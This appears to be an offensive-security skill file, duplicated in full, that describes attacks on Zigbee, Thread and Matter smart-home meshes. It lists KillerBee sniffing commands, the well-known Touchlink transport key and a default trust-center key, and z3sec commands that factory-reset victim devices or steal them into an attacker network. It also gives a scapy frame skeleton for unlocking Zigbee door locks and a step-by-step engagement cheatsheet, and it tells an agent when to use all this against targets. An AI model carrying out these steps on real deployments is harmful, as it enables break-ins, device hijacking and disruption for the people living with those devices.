name

offensive-zigbee-thread-matter

description

Zigbee, Thread, and Matter mesh-protocol attack methodology — IEEE 802.15.4 sniffing with TI CC2531 / CC2540 / Sonoff Zigbee Dongle E, KillerBee toolkit, Touchlink commissioning abuse with the well-known transport key, replay/injection attacks, Zigbee Cluster Library command abuse for door locks and bulbs, Thread network credential theft, Matter commissioning chain analysis, and 6LoWPAN/IPv6 routing exploitation. Use when targeting smart-home or commercial mesh deployments, Zigbee-based door locks, lighting, or sensor networks.

Zigbee / Thread / Matter Attacks

802.15.4-based mesh protocols underpin most "smart home" devices. Zigbee is widely deployed and has well-known crypto-key-reuse issues; Thread (modern, IPv6-based) ships with stronger defaults; Matter unifies their commissioning model with stronger crypto but still has implementation pitfalls.

Quick Workflow

Sniff target frequency (channels 11–26 in 2.4 GHz)
Identify network coordinator and joining devices
For Zigbee: try Touchlink commissioning with the well-known key
Capture join-key exchange when devices commission
Replay or inject ZCL/ZHA cluster commands

Hardware

Adapter	Use
TI CC2531 USB stick	Cheap, works with Zigbee2MQTT, KillerBee
TI CC2540 / CC2652	Zigbee + Thread + BLE
Sonoff Zigbee Dongle E (CC2652P)	Modern, well-supported
ApiMote (KillerBee dev)	Multi-channel, scapy-dot15d4
HackRF + appropriate firmware	Lower-level RF flexibility

Discovery + Sniffing

# KillerBee suite
zbstumbler -i 0                 # find Zigbee networks
zbid                            # ID coordinators
zbdump -c 11 -w zigbee.pcap     # dump channel 11 to pcap

# scapy-dot15d4 for crafted frames
python3
>>> from scapy.contrib.dot15d4 import *
>>> sniff(iface='/dev/ttyACM0', count=50)

In Wireshark with the dot15d4 + zbee_nwk dissectors, you'll see frame counters, network keys (if joined), and ZCL commands.

Touchlink Commissioning Abuse

Touchlink (used by Zigbee 3.0 commissioning, especially in lighting) uses a well-known transport key:

0x9F559A553B7A6B2C5C4FBB4E84956F3D

Many consumer Zigbee bulbs / strips accept Touchlink commissioning from any nearby radio with this key — joining them to your network or stealing them from theirs.

# z3sec — Zigbee 3 commissioning attack toolkit
git clone https://github.com/IoTsec/Z3sec
python z3sec_inter_pan.py --command "factory_reset_request" --device <addr>
python z3sec_inter_pan.py --command "join_network" --network <PANID>

Outcomes:

Factory-reset victim devices remotely (DoS / mass disrupt)
Steal lights / sensors into attacker network
Read network keys after joining device-to-network

Network Key Capture During Joins

# Capture coordinator + joining device exchange
zbdump -c <ch> -w join.pcap

# Decrypt if you obtain the trust center link key
# Older Zigbee 1.x networks used a default trust center link key:
# ZigBeeAlliance09
# Modern networks use device-specific install codes

Once you have the network key, all traffic on that mesh is decrypted in Wireshark.

ZCL / ZHA Cluster Command Abuse

Zigbee Cluster Library defines on/off/level/lock clusters. With network key, you can issue commands as any device:

# scapy-dot15d4 frame to unlock a door lock
from scapy.contrib.dot15d4 import *
from scapy.contrib.zigbee import *

frame = Dot15d4FCS()/Dot15d4Data()/ZigbeeNWK(...)/ZigbeeAppDataPayload(...)/ZCLDoorLock(...)
sendp(frame, iface='/dev/ttyACM0')

The same primitive opens locks, toggles switches, dims lights, or floods the network with control traffic.

Thread Specifics

Thread (used by Apple HomePod, Nest, Eero) uses 802.15.4 with IPv6 (6LoWPAN) and stronger commissioning crypto.

Network credential is a commissioner-distributed PSKc
Devices join with the commissioner present
Mesh commissioning protocol is over UDP/CoAP

Attack surface:

PSKc theft from commissioner devices (mobile app companion, Apple Home, Nest app)
Reusing a leaked credential to join target network
6LoWPAN routing attacks (rank manipulation, sinkhole)

Matter Commissioning

Matter unifies Zigbee/Thread/Wi-Fi device onboarding under one commissioning model:

QR code or manual setup code grants commissioning permission
Bluetooth LE used for initial commissioning
Subsequent communication over Wi-Fi or Thread

Attack surface:

Setup-code reuse / replay if commissioning window not closed
BLE-MITM during initial commissioning (see offensive-bluetooth-ble)
Fabric-attestation flaws in early implementations

Detection

Coordinator may log unexpected device joins
Hub apps surface "new device" notifications — commonly ignored by users
Wireshark/Sonoff captures from defenders are rare — most environments don't monitor 802.15.4

Engagement Cheatsheet

# 1. Identify networks + channels
zbstumbler -i 0

# 2. Sniff target channel
zbdump -c <ch> -w cap.pcap
# Open in Wireshark with dot15d4/zigbee dissectors

# 3. Touchlink attack on consumer Zigbee 3.0 lighting
python z3sec_inter_pan.py --command "factory_reset_request" --target <addr>

# 4. Steal device into attacker network
python z3sec_inter_pan.py --command "join_network" --target <addr>

# 5. With network key, issue ZCL commands directly
# (custom scapy-dot15d4 + zbee_nwk frames)

# 6. For Thread: focus on commissioner / PSKc theft from companion apps

Key References

KillerBee: github.com/riverloopsec/killerbee
Z3sec: github.com/IoTsec/Z3sec
"Zigbee Insecurity" research (CON Black Hat talks)
Thread spec: threadgroup.org/support
Matter / CSA spec: csa-iot.org/all-solutions/matter
Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md

name

offensive-zigbee-thread-matter

description

Zigbee / Thread / Matter Attacks

Quick Workflow

Sniff target frequency (channels 11–26 in 2.4 GHz)
Identify network coordinator and joining devices
For Zigbee: try Touchlink commissioning with the well-known key
Capture join-key exchange when devices commission
Replay or inject ZCL/ZHA cluster commands

Hardware

Adapter	Use
TI CC2531 USB stick	Cheap, works with Zigbee2MQTT, KillerBee
TI CC2540 / CC2652	Zigbee + Thread + BLE
Sonoff Zigbee Dongle E (CC2652P)	Modern, well-supported
ApiMote (KillerBee dev)	Multi-channel, scapy-dot15d4
HackRF + appropriate firmware	Lower-level RF flexibility

Discovery + Sniffing

# KillerBee suite
zbstumbler -i 0                 # find Zigbee networks
zbid                            # ID coordinators
zbdump -c 11 -w zigbee.pcap     # dump channel 11 to pcap

# scapy-dot15d4 for crafted frames
python3
>>> from scapy.contrib.dot15d4 import *
>>> sniff(iface='/dev/ttyACM0', count=50)

In Wireshark with the dot15d4 + zbee_nwk dissectors, you'll see frame counters, network keys (if joined), and ZCL commands.

Touchlink Commissioning Abuse

Touchlink (used by Zigbee 3.0 commissioning, especially in lighting) uses a well-known transport key:

0x9F559A553B7A6B2C5C4FBB4E84956F3D

Many consumer Zigbee bulbs / strips accept Touchlink commissioning from any nearby radio with this key — joining them to your network or stealing them from theirs.

# z3sec — Zigbee 3 commissioning attack toolkit
git clone https://github.com/IoTsec/Z3sec
python z3sec_inter_pan.py --command "factory_reset_request" --device <addr>
python z3sec_inter_pan.py --command "join_network" --network <PANID>

Outcomes:

Factory-reset victim devices remotely (DoS / mass disrupt)
Steal lights / sensors into attacker network
Read network keys after joining device-to-network

Network Key Capture During Joins

# Capture coordinator + joining device exchange
zbdump -c <ch> -w join.pcap

# Decrypt if you obtain the trust center link key
# Older Zigbee 1.x networks used a default trust center link key:
# ZigBeeAlliance09
# Modern networks use device-specific install codes

Once you have the network key, all traffic on that mesh is decrypted in Wireshark.

ZCL / ZHA Cluster Command Abuse

Zigbee Cluster Library defines on/off/level/lock clusters. With network key, you can issue commands as any device:

# scapy-dot15d4 frame to unlock a door lock
from scapy.contrib.dot15d4 import *
from scapy.contrib.zigbee import *

frame = Dot15d4FCS()/Dot15d4Data()/ZigbeeNWK(...)/ZigbeeAppDataPayload(...)/ZCLDoorLock(...)
sendp(frame, iface='/dev/ttyACM0')

The same primitive opens locks, toggles switches, dims lights, or floods the network with control traffic.

Thread Specifics

Thread (used by Apple HomePod, Nest, Eero) uses 802.15.4 with IPv6 (6LoWPAN) and stronger commissioning crypto.

Network credential is a commissioner-distributed PSKc
Devices join with the commissioner present
Mesh commissioning protocol is over UDP/CoAP

Attack surface:

PSKc theft from commissioner devices (mobile app companion, Apple Home, Nest app)
Reusing a leaked credential to join target network
6LoWPAN routing attacks (rank manipulation, sinkhole)

Matter Commissioning

Matter unifies Zigbee/Thread/Wi-Fi device onboarding under one commissioning model:

QR code or manual setup code grants commissioning permission
Bluetooth LE used for initial commissioning
Subsequent communication over Wi-Fi or Thread

Attack surface:

Setup-code reuse / replay if commissioning window not closed
BLE-MITM during initial commissioning (see offensive-bluetooth-ble)
Fabric-attestation flaws in early implementations

Detection

Coordinator may log unexpected device joins
Hub apps surface "new device" notifications — commonly ignored by users
Wireshark/Sonoff captures from defenders are rare — most environments don't monitor 802.15.4

Engagement Cheatsheet

# 1. Identify networks + channels
zbstumbler -i 0

# 2. Sniff target channel
zbdump -c <ch> -w cap.pcap
# Open in Wireshark with dot15d4/zigbee dissectors

# 3. Touchlink attack on consumer Zigbee 3.0 lighting
python z3sec_inter_pan.py --command "factory_reset_request" --target <addr>

# 4. Steal device into attacker network
python z3sec_inter_pan.py --command "join_network" --target <addr>

# 5. With network key, issue ZCL commands directly
# (custom scapy-dot15d4 + zbee_nwk frames)

# 6. For Thread: focus on commissioner / PSKc theft from companion apps

Key References

KillerBee: github.com/riverloopsec/killerbee
Z3sec: github.com/IoTsec/Z3sec
"Zigbee Insecurity" research (CON Black Hat talks)
Thread spec: threadgroup.org/support
Matter / CSA spec: csa-iot.org/all-solutions/matter
Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md